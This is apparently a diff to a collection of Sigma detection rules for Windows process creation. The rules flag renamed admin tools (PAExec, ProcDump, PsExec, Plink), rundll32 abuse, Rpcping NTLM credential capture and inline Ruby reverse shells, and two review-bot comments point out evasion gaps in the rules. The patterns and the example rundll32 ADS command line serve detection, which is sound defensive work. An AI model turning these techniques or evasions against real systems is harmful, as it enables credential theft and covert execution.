diff --git a/sigma/sysmon/process_creation/proc_creation_win_renamed_office_processes.yml b/sigma/sysmon/process_creation/proc_creation_win_renamed_office_processes.yml index ca232ddde..8158f4045 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_renamed_office_processes.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_renamed_office_processes.yml @@ -18,24 +18,24 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - OriginalFileName: - - Excel.exe - - MSACCESS.EXE - - MSPUB.EXE - - OneNote.exe - - OneNoteM.exe - - OUTLOOK.EXE - - POWERPNT.EXE - - WinWord.exe - - Description: - - Microsoft Access - - Microsoft Excel - - Microsoft OneNote - - Microsoft Outlook - - Microsoft PowerPoint - - Microsoft Publisher - - Microsoft Word - - Sent to OneNote Tool + - OriginalFileName: + - Excel.exe + - MSACCESS.EXE + - MSPUB.EXE + - OneNote.exe + - OneNoteM.exe + - OUTLOOK.EXE + - POWERPNT.EXE + - WinWord.exe + - Description: + - Microsoft Access + - Microsoft Excel + - Microsoft OneNote + - Microsoft Outlook + - Microsoft PowerPoint + - Microsoft Publisher + - Microsoft Word + - Sent to OneNote Tool filter_main_legit_names: Image|endswith: - \EXCEL.exe diff --git a/sigma/sysmon/process_creation/proc_creation_win_renamed_paexec.yml b/sigma/sysmon/process_creation/proc_creation_win_renamed_paexec.yml index 4a3712fe8..1aeefd6d5 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_renamed_paexec.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_renamed_paexec.yml @@ -1,8 +1,8 @@ title: Renamed PAExec Execution id: c4e49831-1496-40cf-8ce1-b53f942b02f9 related: - - id: 7b0666ad-3e38-4e3d-9bab-78b06de85f7b - type: obsoletes + - id: 7b0666ad-3e38-4e3d-9bab-78b06de85f7b + type: obsoletes status: test description: Detects execution of renamed version of PAExec. Often used by attackers references: 
@@ -23,28 +23,26 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Description: PAExec Application - - OriginalFileName: PAExec.exe - - Product|contains: PAExec - - Imphash: - - 11D40A7B7876288F919AB819CC2D9802 - - 6444f8a34e99b8f7d9647de66aabe516 - - dfd6aa3f7b2b1035b76b718f1ddc689f - - 1a6cca4d5460b1710a12dea39e4a592c - - Hashes|contains: - - IMPHASH=11D40A7B7876288F919AB819CC2D9802 - - IMPHASH=6444f8a34e99b8f7d9647de66aabe516 - - IMPHASH=dfd6aa3f7b2b1035b76b718f1ddc689f - - IMPHASH=1a6cca4d5460b1710a12dea39e4a592c + - Description: PAExec Application + - OriginalFileName: PAExec.exe + - Product|contains: PAExec + - Imphash: + - 11D40A7B7876288F919AB819CC2D9802 + - 6444f8a34e99b8f7d9647de66aabe516 + - dfd6aa3f7b2b1035b76b718f1ddc689f + - 1a6cca4d5460b1710a12dea39e4a592c + - Hashes|contains: + - IMPHASH=11D40A7B7876288F919AB819CC2D9802 + - IMPHASH=6444f8a34e99b8f7d9647de66aabe516 + - IMPHASH=dfd6aa3f7b2b1035b76b718f1ddc689f + - IMPHASH=1a6cca4d5460b1710a12dea39e4a592c filter: - - Image|endswith: \paexec.exe - - Image|startswith: C:\Windows\PAExec- + - Image|endswith: \paexec.exe + - Image|startswith: C:\Windows\PAExec- condition: process_creation and (selection and not filter) falsepositives: - Weird admins that rename their tools - - Software companies that bundle PAExec with their software and rename it, so - that it is less embarrassing - - When executed with the "-s" flag. PAExec will copy itself to the "C:\Windows\" - directory with a different name. Usually like this "PAExec-[XXXXX]-[ComputerName]" + - Software companies that bundle PAExec with their software and rename it, so that it is less embarrassing + - When executed with the "-s" flag. PAExec will copy itself to the "C:\Windows\" directory with a different name. Usually like this "PAExec-[XXXXX]-[ComputerName]" level: high ruletype: Sigma 
diff --git a/sigma/sysmon/process_creation/proc_creation_win_renamed_pingcastle.yml b/sigma/sysmon/process_creation/proc_creation_win_renamed_pingcastle.yml index b2a30c95c..c4814e7fd 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_renamed_pingcastle.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_renamed_pingcastle.yml @@ -1,8 +1,7 @@ title: Renamed PingCastle Binary Execution id: 2433a154-bb3d-42e4-86c3-a26bdac91c45 status: experimental -description: Detects the execution of a renamed "PingCastle" binary based on the PE - metadata fields. +description: Detects the execution of a renamed "PingCastle" binary based on the PE metadata fields. references: - https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/ - https://www.pingcastle.com/documentation/scanner/ 
@@ -22,34 +21,34 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - OriginalFileName: - - PingCastleReporting.exe - - PingCastleCloud.exe - - PingCastle.exe - - CommandLine|contains: - - --scanner aclcheck - - --scanner antivirus - - --scanner computerversion - - --scanner foreignusers - - --scanner laps_bitlocker - - --scanner localadmin - - --scanner nullsession - - --scanner nullsession-trust - - --scanner oxidbindings - - --scanner remote - - --scanner share - - --scanner smb - - --scanner smb3querynetwork - - --scanner spooler - - --scanner startup - - --scanner zerologon - - CommandLine|contains: --no-enum-limit - - CommandLine|contains|all: - - --healthcheck - - --level Full - - CommandLine|contains|all: - - --healthcheck - - '--server ' + - OriginalFileName: + - PingCastleReporting.exe + - PingCastleCloud.exe + - PingCastle.exe + - CommandLine|contains: + - --scanner aclcheck + - --scanner antivirus + - --scanner computerversion + - --scanner foreignusers + - --scanner laps_bitlocker + - --scanner localadmin + - --scanner nullsession + - --scanner nullsession-trust + - --scanner oxidbindings + - --scanner remote + - --scanner share + - --scanner smb + - --scanner smb3querynetwork + - --scanner spooler + - --scanner startup + - --scanner zerologon + - CommandLine|contains: --no-enum-limit + - CommandLine|contains|all: + - --healthcheck + - --level Full + - CommandLine|contains|all: + - --healthcheck + - '--server ' filter_main_img: Image|endswith: - \PingCastleReporting.exe diff --git a/sigma/sysmon/process_creation/proc_creation_win_renamed_plink.yml b/sigma/sysmon/process_creation/proc_creation_win_renamed_plink.yml index 8bc965fe0..62cb55821 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_renamed_plink.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_renamed_plink.yml 
@@ -20,11 +20,11 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - OriginalFileName: Plink - - CommandLine|contains|all: - - ' -l forward' - - ' -P ' - - ' -R ' + - OriginalFileName: Plink + - CommandLine|contains|all: + - ' -l forward' + - ' -P ' + - ' -R ' filter: Image|endswith: \plink.exe condition: process_creation and (selection and not filter) diff --git a/sigma/sysmon/process_creation/proc_creation_win_renamed_pressanykey.yml b/sigma/sysmon/process_creation/proc_creation_win_renamed_pressanykey.yml index 828cf1f44..2026d2dea 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_renamed_pressanykey.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_renamed_pressanykey.yml @@ -1,11 +1,10 @@ title: Visual Studio NodejsTools PressAnyKey Renamed Execution id: 65c3ca2c-525f-4ced-968e-246a713d164f related: - - id: a20391f8-76fb-437b-abc0-dba2df1952c6 - type: similar + - id: a20391f8-76fb-437b-abc0-dba2df1952c6 + type: similar status: test -description: Detects renamed execution of "Microsoft.NodejsTools.PressAnyKey.exe", - which can be abused as a LOLBIN to execute arbitrary binaries +description: Detects renamed execution of "Microsoft.NodejsTools.PressAnyKey.exe", which can be abused as a LOLBIN to execute arbitrary binaries references: - https://twitter.com/mrd0x/status/1463526834918854661 - https://gist.github.com/nasbench/a989ce64cefa8081bd50cf6ad8c491b5 diff --git a/sigma/sysmon/process_creation/proc_creation_win_renamed_rundll32_dllregisterserver.yml b/sigma/sysmon/process_creation/proc_creation_win_renamed_rundll32_dllregisterserver.yml index 25b439fd6..37bb3c410 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_renamed_rundll32_dllregisterserver.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_renamed_rundll32_dllregisterserver.yml 
@@ -1,12 +1,10 @@ title: Potential Renamed Rundll32 Execution id: 2569ed8c-1147-498a-9b8c-2ad3656b10ed related: - - id: 0ba1da6d-b6ce-4366-828c-18826c9de23e - type: derived + - id: 0ba1da6d-b6ce-4366-828c-18826c9de23e + type: derived status: test -description: Detects when 'DllRegisterServer' is called in the commandline and the - image is not rundll32. This could mean that the 'rundll32' utility has been renamed - in order to avoid detection +description: Detects when 'DllRegisterServer' is called in the commandline and the image is not rundll32. This could mean that the 'rundll32' utility has been renamed in order to avoid detection references: - https://twitter.com/swisscom_csirt/status/1331634525722521602?s=20 - https://app.any.run/tasks/f74c5157-8508-4ac6-9805-d63fe7b0d399/ @@ -24,7 +22,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: DllRegisterServer + CommandLine|contains: DllRegisterServer filter: Image|endswith: \rundll32.exe condition: process_creation and (selection and not filter) diff --git a/sigma/sysmon/process_creation/proc_creation_win_renamed_rurat.yml b/sigma/sysmon/process_creation/proc_creation_win_renamed_rurat.yml index 810b9860c..5fb8b84d2 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_renamed_rurat.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_renamed_rurat.yml @@ -1,8 +1,7 @@ title: Renamed Remote Utilities RAT (RURAT) Execution id: 9ef27c24-4903-4192-881a-3adde7ff92a5 status: test -description: Detects execution of renamed Remote Utilities (RURAT) via Product PE - header field +description: Detects execution of renamed Remote Utilities (RURAT) via Product PE header field references: - https://redcanary.com/blog/misbehaving-rats/ author: Nasreddine Bencherchali (Nextron Systems) 
diff --git a/sigma/sysmon/process_creation/proc_creation_win_renamed_sysinternals_procdump.yml b/sigma/sysmon/process_creation/proc_creation_win_renamed_sysinternals_procdump.yml index 34ee78ada..daf4819f1 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_renamed_sysinternals_procdump.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_renamed_sysinternals_procdump.yml @@ -1,11 +1,10 @@ title: Renamed ProcDump Execution id: 4a0b2c7e-7cb2-495d-8b63-5f268e7bfd67 related: - - id: 03795938-1387-481b-9f4c-3f6241e604fe - type: obsoletes + - id: 03795938-1387-481b-9f4c-3f6241e604fe + type: obsoletes status: test -description: Detects the execution of a renamed ProcDump executable often used by - attackers or malware +description: Detects the execution of a renamed ProcDump executable often used by attackers or malware references: - https://docs.microsoft.com/en-us/sysinternals/downloads/procdump author: Florian Roth (Nextron Systems) @@ -25,19 +24,18 @@ detection: selection_org: OriginalFileName: procdump selection_args_ma: - CommandLine|contains: + CommandLine|contains: - ' -ma ' - ' /ma ' selection_args_other: - CommandLine|contains: + CommandLine|contains: - ' -accepteula ' - ' /accepteula ' filter: Image|endswith: - \procdump.exe - \procdump64.exe - condition: process_creation and ((selection_org or all of selection_args_*) and - not filter) + condition: process_creation and ((selection_org or all of selection_args_*) and not filter) falsepositives: - Procdump illegaly bundled with legitimate software - Administrators who rename binaries (should be investigated) diff --git a/sigma/sysmon/process_creation/proc_creation_win_renamed_sysinternals_psexec_service.yml b/sigma/sysmon/process_creation/proc_creation_win_renamed_sysinternals_psexec_service.yml index 74e9814c8..30ea5d40a 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_renamed_sysinternals_psexec_service.yml 
+++ b/sigma/sysmon/process_creation/proc_creation_win_renamed_sysinternals_psexec_service.yml @@ -1,8 +1,7 @@ title: Renamed PsExec Service Execution id: 51ae86a2-e2e1-4097-ad85-c46cb6851de4 status: test -description: Detects suspicious launch of a renamed version of the PSEXESVC service - with, which is not often used by legitimate administrators +description: Detects suspicious launch of a renamed version of the PSEXESVC service with, which is not often used by legitimate administrators references: - https://docs.microsoft.com/en-us/sysinternals/downloads/psexec - https://www.youtube.com/watch?v=ro2QuZTIMBM diff --git a/sigma/sysmon/process_creation/proc_creation_win_renamed_sysinternals_sdelete.yml b/sigma/sysmon/process_creation/proc_creation_win_renamed_sysinternals_sdelete.yml index 2f4cd0b7d..08840ddfa 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_renamed_sysinternals_sdelete.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_renamed_sysinternals_sdelete.yml @@ -1,8 +1,7 @@ title: Renamed Sysinternals Sdelete Execution id: c1d867fe-8d95-4487-aab4-e53f2d339f90 status: test -description: Detects the use of a renamed SysInternals Sdelete, which is something - an administrator shouldn't do (the renaming) +description: Detects the use of a renamed SysInternals Sdelete, which is something an administrator shouldn't do (the renaming) references: - https://docs.microsoft.com/en-us/sysinternals/downloads/sdelete - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md diff --git a/sigma/sysmon/process_creation/proc_creation_win_renamed_vmnat.yml b/sigma/sysmon/process_creation/proc_creation_win_renamed_vmnat.yml index a8964dfc1..2e4409ebe 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_renamed_vmnat.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_renamed_vmnat.yml 
@@ -1,8 +1,7 @@ title: Renamed Vmnat.exe Execution id: 7b4f794b-590a-4ad4-ba18-7964a2832205 status: test -description: Detects renamed vmnat.exe or portable version that can be used for DLL - side-loading +description: Detects renamed vmnat.exe or portable version that can be used for DLL side-loading references: - https://twitter.com/malmoeb/status/1525901219247845376 author: elhoim diff --git a/sigma/sysmon/process_creation/proc_creation_win_renamed_whoami.yml b/sigma/sysmon/process_creation/proc_creation_win_renamed_whoami.yml index 147cb5654..aedd5909b 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_renamed_whoami.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_renamed_whoami.yml @@ -1,8 +1,7 @@ title: Renamed Whoami Execution id: f1086bf7-a0c4-4a37-9102-01e573caf4a0 status: test -description: Detects the execution of whoami that has been renamed to a different - name to avoid detection +description: Detects the execution of whoami that has been renamed to a different name to avoid detection references: - https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/ - https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/ diff --git a/sigma/sysmon/process_creation/proc_creation_win_rpcping_credential_capture.yml b/sigma/sysmon/process_creation/proc_creation_win_rpcping_credential_capture.yml index f3cd0d512..6a7c57bd2 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_rpcping_credential_capture.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_rpcping_credential_capture.yml 
@@ -1,8 +1,7 @@ title: Capture Credentials with Rpcping.exe id: 93671f99-04eb-4ab4-a161-70d446a84003 status: test -description: Detects using Rpcping.exe to send a RPC test connection to the target - server (-s) and force the NTLM hash to be sent in the process. +description: Detects using Rpcping.exe to send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process. references: - https://lolbas-project.github.io/lolbas/Binaries/Rpcping/ - https://twitter.com/vysecurity/status/974806438316072960 @@ -25,22 +24,22 @@ detection: use_rpcping: Image|endswith: \rpcping.exe remote_server: - CommandLine|contains: + CommandLine|contains: - -s - /s ntlm_auth: - - CommandLine|contains|all: - - -u - - NTLM - - CommandLine|contains|all: - - /u - - NTLM - - CommandLine|contains|all: - - -t - - ncacn_np - - CommandLine|contains|all: - - /t - - ncacn_np + - CommandLine|contains|all: + - -u + - NTLM + - CommandLine|contains|all: + - /u + - NTLM + - CommandLine|contains|all: + - -t + - ncacn_np + - CommandLine|contains|all: + - /t + - ncacn_np condition: process_creation and (use_rpcping and remote_server and ntlm_auth) falsepositives: - Unlikely diff --git a/sigma/sysmon/process_creation/proc_creation_win_ruby_inline_command_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_ruby_inline_command_execution.yml index b9e318b94..01440352b 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_ruby_inline_command_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_ruby_inline_command_execution.yml 
@@ -1,8 +1,7 @@ title: Ruby Inline Command Execution id: 20a5ffa1-3848-4584-b6f8-c7c7fd9f69c8 status: test -description: Detects execution of ruby using the "-e" flag. This is could be used - as a way to launch a reverse shell or execute live ruby code. +description: Detects execution of ruby using the "-e" flag. This is could be used as a way to launch a reverse shell or execute live ruby code. references: - https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet - https://www.revshells.com/ @@ -20,10 +19,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \ruby.exe - - OriginalFileName: ruby.exe + - Image|endswith: \ruby.exe + - OriginalFileName: ruby.exe selection_cli: - CommandLine|contains: ' -e' + CommandLine|contains: ' -e' condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_rundll32_ads_stored_dll_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_rundll32_ads_stored_dll_execution.yml index c87d4287a..6beb7f448 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_rundll32_ads_stored_dll_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_rundll32_ads_stored_dll_execution.yml @@ -1,8 +1,7 @@ title: Potential Rundll32 Execution With DLL Stored In ADS id: 9248c7e1-2bf3-4661-a22c-600a8040b446 status: test -description: Detects execution of rundll32 where the DLL being called is stored in - an Alternate Data Stream (ADS). +description: Detects execution of rundll32 where the DLL being called is stored in an Alternate Data Stream (ADS). references: - https://lolbas-project.github.io/lolbas/Binaries/Rundll32 author: Harjot Singh, '@cyb3rjy0t' 
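Review bot: The `' -e'` pattern in selection_cli has no terminating boundary, so it matches any argument that merely starts with `-e`, and with Sigma's default case-insensitive string matching it also fires on Ruby's `-E`/`-Eex:in` encoding flag, which is not mentioned under falsepositives. At the same time the combined short-option forms `-ne '...'`/`-pe '...'` (and `-rjson -e` style is fine, but `-ne` has no space before the `e`) do not contain `' -e'` and evade the rule. If these forms are in scope I would add `- ' -ne '` and `- ' -pe '` to the `CommandLine|contains` list and record the `-E` false positive, e.g. `- Ruby invoked with the -E encoding flag` under falsepositives. If this file is generated from the upstream Sigma rule, the change belongs there rather than in the converted copy.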
@@ -20,10 +19,13 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \rundll32.exe - - OriginalFileName: RUNDLL32.EXE + - Image|endswith: \rundll32.exe + - OriginalFileName: RUNDLL32.EXE selection_cli: - CommandLine|re: '[Rr][Uu][Nn][Dd][Ll][Ll]32(\.[Ee][Xx][Ee])? \S+?\w:\S+?:' + # Example: + # rundll32 "C:\ads\file.txt:ADSDLL.dll",DllMain + # Note: This doesn't cover the use case where a full path for the DLL isn't used. As it requires a more expensive regex + CommandLine|re: '[Rr][Uu][Nn][Dd][Ll][Ll]32(\.[Ee][Xx][Ee])? \S+?\w:\S+?:' condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_rundll32_advpack_obfuscated_ordinal_call.yml b/sigma/sysmon/process_creation/proc_creation_win_rundll32_advpack_obfuscated_ordinal_call.yml index e97e31a9b..fdb5ebbd5 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_rundll32_advpack_obfuscated_ordinal_call.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_rundll32_advpack_obfuscated_ordinal_call.yml @@ -1,8 +1,7 @@ title: Suspicious Advpack Call Via Rundll32.EXE id: a1473adb-5338-4a20-b4c3-126763e2d3d3 status: experimental -description: Detects execution of "rundll32" calling "advpack.dll" with potential - obfuscated ordinal calls in order to leverage the "RegisterOCX" function +description: Detects execution of "rundll32" calling "advpack.dll" with potential obfuscated ordinal calls in order to leverage the "RegisterOCX" function references: - https://twitter.com/Hexacorn/status/1224848930795552769 - http://www.hexacorn.com/blog/2020/02/05/stay-positive-lolbins-not/ 
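Review bot: The regex in selection_cli starts with the literal `rundll32` token, so the `OriginalFileName: RUNDLL32.EXE` alternative in selection_img never adds coverage: a renamed copy is launched under its new name, and the command line then fails the regex regardless of the PE metadata. The `\S+?` segments also stop at whitespace, so a quoted path with a space (`"C:\ads\my file.txt:ADSDLL.dll",DllMain`) is not matched even though it is a valid invocation. The new comment only documents the missing-full-path case; I would extend it to `# Note: a renamed rundll32 binary and DLL paths containing spaces are also not covered by this regex` so analysts do not assume the OriginalFileName branch closes those gaps. Widening the regex itself would need a false-positive check against URL-like arguments (`\w:\S+?:` already matches `http://host:port`-style strings), so I would leave the pattern and fix the documentation here.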
@@ -19,16 +18,16 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \rundll32.exe - - OriginalFileName: RUNDLL32.EXE - - CommandLine|contains: rundll32 + - Image|endswith: \rundll32.exe + - OriginalFileName: RUNDLL32.EXE + - CommandLine|contains: rundll32 selection_cli_dll: - CommandLine|contains: advpack + CommandLine|contains: advpack selection_cli_ordinal: - - CommandLine|contains|all: - - '#+' - - '12' - - CommandLine|contains: '#-' + - CommandLine|contains|all: + - '#+' + - '12' + - CommandLine|contains: '#-' condition: process_creation and (all of selection_*) falsepositives: - Unlikely diff --git a/sigma/sysmon/process_creation/proc_creation_win_rundll32_by_ordinal.yml b/sigma/sysmon/process_creation/proc_creation_win_rundll32_by_ordinal.yml index 1acf590be..a04ad8f73 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_rundll32_by_ordinal.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_rundll32_by_ordinal.yml @@ -22,16 +22,16 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \rundll32.exe - - OriginalFileName: RUNDLL32.EXE + - Image|endswith: \rundll32.exe + - OriginalFileName: RUNDLL32.EXE selection_cli: - CommandLine|contains: + CommandLine|contains: - ',#' - ', #' - - '.dll #' - - '.ocx #' + - '.dll #' # Sysmon removes , in its log + - '.ocx #' # HermeticWizard filter_edge: - CommandLine|contains|all: + CommandLine|contains|all: - EDGEHTML.dll - '#141' filter_vsbuild_dll: 
@@ -39,15 +39,14 @@ detection: - \Msbuild\Current\Bin\ - \VC\Tools\MSVC\ - \Tracker.exe - CommandLine|contains: + CommandLine|contains: - \FileTracker32.dll,#1 - \FileTracker32.dll",#1 - \FileTracker64.dll,#1 - \FileTracker64.dll",#1 condition: process_creation and (all of selection_* and not 1 of filter_*) falsepositives: - - False positives depend on scripts and administrative tools used in the monitored - environment + - False positives depend on scripts and administrative tools used in the monitored environment - Windows control panel elements have been identified as source (mmc) level: high ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_rundll32_inline_vbs.yml b/sigma/sysmon/process_creation/proc_creation_win_rundll32_inline_vbs.yml index 598f9e85a..17c96a484 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_rundll32_inline_vbs.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_rundll32_inline_vbs.yml @@ -1,8 +1,7 @@ title: Suspicious Rundll32 Invoking Inline VBScript id: 1cc50f3f-1fc8-4acf-b2e9-6f172e1fdebd status: test -description: Detects suspicious process related to rundll32 based on command line - that invokes inline VBScript as seen being used by UNC2452 +description: Detects suspicious process related to rundll32 based on command line that invokes inline VBScript as seen being used by UNC2452 references: - https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/ author: Florian Roth (Nextron Systems) @@ -20,7 +19,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - rundll32.exe - Execute - RegRead diff --git a/sigma/sysmon/process_creation/proc_creation_win_rundll32_installscreensaver.yml b/sigma/sysmon/process_creation/proc_creation_win_rundll32_installscreensaver.yml index 5f5f94172..ca22189fe 100644 
--- a/sigma/sysmon/process_creation/proc_creation_win_rundll32_installscreensaver.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_rundll32_installscreensaver.yml @@ -1,8 +1,7 @@ title: Rundll32 InstallScreenSaver Execution id: 15bd98ea-55f4-4d37-b09a-e7caa0fa2221 status: test -description: An attacker may execute an application as a SCR File using rundll32.exe - desk.cpl,InstallScreenSaver +description: An attacker may execute an application as a SCR File using rundll32.exe desk.cpl,InstallScreenSaver references: - https://lolbas-project.github.io/lolbas/Libraries/Desk/ - https://github.com/redcanaryco/atomic-red-team/blob/0f229c0e42bfe7ca736a14023836d65baa941ed2/atomics/T1218.011/T1218.011.md#atomic-test-13---rundll32-with-deskcpl @@ -21,10 +20,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \rundll32.exe - - OriginalFileName: RUNDLL32.EXE + - Image|endswith: \rundll32.exe + - OriginalFileName: RUNDLL32.EXE selection_cli: - CommandLine|contains: InstallScreenSaver + CommandLine|contains: InstallScreenSaver condition: process_creation and (all of selection_*) falsepositives: - Legitimate installation of a new screensaver diff --git a/sigma/sysmon/process_creation/proc_creation_win_rundll32_js_runhtmlapplication.yml b/sigma/sysmon/process_creation/proc_creation_win_rundll32_js_runhtmlapplication.yml index 80bd3c071..47422f621 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_rundll32_js_runhtmlapplication.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_rundll32_js_runhtmlapplication.yml 
@@ -1,8 +1,7 @@ title: Rundll32 JS RunHTMLApplication Pattern id: 9f06447a-a33a-4cbe-a94f-a3f43184a7a3 status: test -description: Detects suspicious command line patterns used when rundll32 is used to - run JavaScript code +description: Detects suspicious command line patterns used when rundll32 is used to run JavaScript code references: - http://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_DETECTION_BYPASS.txt author: Florian Roth (Nextron Systems) @@ -18,12 +17,12 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection1: - CommandLine|contains|all: + CommandLine|contains|all: - rundll32 - javascript - ..\..\mshtml,RunHTMLApplication selection2: - CommandLine|contains: ;document.write();GetObject("script + CommandLine|contains: ;document.write();GetObject("script condition: process_creation and (1 of selection*) falsepositives: - Unlikely diff --git a/sigma/sysmon/process_creation/proc_creation_win_rundll32_keymgr.yml b/sigma/sysmon/process_creation/proc_creation_win_rundll32_keymgr.yml index 6644d7a6d..8965ac536 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_rundll32_keymgr.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_rundll32_keymgr.yml @@ -1,8 +1,7 @@ title: Suspicious Key Manager Access id: a4694263-59a8-4608-a3a0-6f8d3a51664c status: test -description: Detects the invocation of the Stored User Names and Passwords dialogue - (Key Manager) +description: Detects the invocation of the Stored User Names and Passwords dialogue (Key Manager) references: - https://twitter.com/NinjaParanoid/status/1516442028963659777 author: Florian Roth (Nextron Systems) 
@@ -20,10 +19,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \rundll32.exe - - OriginalFileName: RUNDLL32.EXE + - Image|endswith: \rundll32.exe + - OriginalFileName: RUNDLL32.EXE selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - keymgr - KRShowKeyMgr condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_rundll32_mshtml_runhtmlapplication.yml b/sigma/sysmon/process_creation/proc_creation_win_rundll32_mshtml_runhtmlapplication.yml index a7afd6eaa..e1d269f5e 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_rundll32_mshtml_runhtmlapplication.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_rundll32_mshtml_runhtmlapplication.yml @@ -1,12 +1,10 @@ title: Mshtml DLL RunHTMLApplication Abuse id: 4782eb5a-a513-4523-a0ac-f3082b26ac5c related: - - id: 9f06447a-a33a-4cbe-a94f-a3f43184a7a3 - type: derived + - id: 9f06447a-a33a-4cbe-a94f-a3f43184a7a3 + type: derived status: test -description: Detects suspicious command line using the "mshtml.dll" RunHTMLApplication - export to run arbitrary code via different protocol handlers (vbscript, javascript, - file, htpp...) +description: Detects suspicious command line using the "mshtml.dll" RunHTMLApplication export to run arbitrary code via different protocol handlers (vbscript, javascript, file, htpp...) references: - https://twitter.com/n1nj4sec/status/1421190238081277959 author: Nasreddine Bencherchali (Nextron Systems) @@ -22,7 +20,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - \..\ - mshtml - RunHTMLApplication diff --git a/sigma/sysmon/process_creation/proc_creation_win_rundll32_no_params.yml b/sigma/sysmon/process_creation/proc_creation_win_rundll32_no_params.yml index 711ec7b98..67458a951 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_rundll32_no_params.yml 
+++ b/sigma/sysmon/process_creation/proc_creation_win_rundll32_no_params.yml @@ -1,8 +1,7 @@ title: Rundll32 Execution Without CommandLine Parameters id: 1775e15e-b61b-4d14-a1a3-80981298085a status: experimental -description: Detects suspicious start of rundll32.exe without any parameters as found - in CobaltStrike beacon activity +description: Detects suspicious start of rundll32.exe without any parameters as found in CobaltStrike beacon activity references: - https://www.cobaltstrike.com/help-opsec - https://twitter.com/ber_m1ng/status/1397948048135778309 @@ -21,7 +20,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|endswith: + CommandLine|endswith: - \rundll32.exe - \rundll32.exe" - \rundll32 diff --git a/sigma/sysmon/process_creation/proc_creation_win_rundll32_ntlmrelay.yml b/sigma/sysmon/process_creation/proc_creation_win_rundll32_ntlmrelay.yml index d03bf3afb..8c6f3d687 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_rundll32_ntlmrelay.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_rundll32_ntlmrelay.yml @@ -1,8 +1,7 @@ title: Suspicious NTLM Authentication on the Printer Spooler Service id: bb76d96b-821c-47cf-944b-7ce377864492 status: test -description: Detects a privilege 